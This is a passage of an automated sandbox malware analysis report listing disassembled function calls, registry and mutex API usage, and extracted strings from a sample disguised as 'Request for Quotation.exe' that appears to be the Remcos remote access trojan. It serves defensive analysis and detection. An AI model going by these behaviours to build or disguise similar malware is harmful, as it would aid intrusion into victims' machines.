                                                                                  • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                  • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                                                                • wcscpy.MSVCRT ref: 00409230
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                                                                • atoi.MSVCRT ref: 00409391
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                                                                • atoi.MSVCRT ref: 00409540
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                  • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                  • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                  • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                  • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                  • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                                                                • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\Request for Quotation.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                                                                • API String ID: 1672879135-1125814707
                                                                                • Opcode ID: aa0dd2ddb201d4670fd5332fb5c6fcc0fdac8b469c95e288c9adb4231053b983
                                                                                • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                                                                • Opcode Fuzzy Hash: aa0dd2ddb201d4670fd5332fb5c6fcc0fdac8b469c95e288c9adb4231053b983
                                                                                • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408C98, Relevance: 261.7, APIs: 134, Strings: 15, Instructions: 938synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                  • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                                                                • OpenMutexA.KERNEL32 ref: 00408E80
                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                                                                • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041BA5C,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                                                                  • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                                                                  • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                                                                  • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                                                                • wcslen.MSVCRT ref: 004090DB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
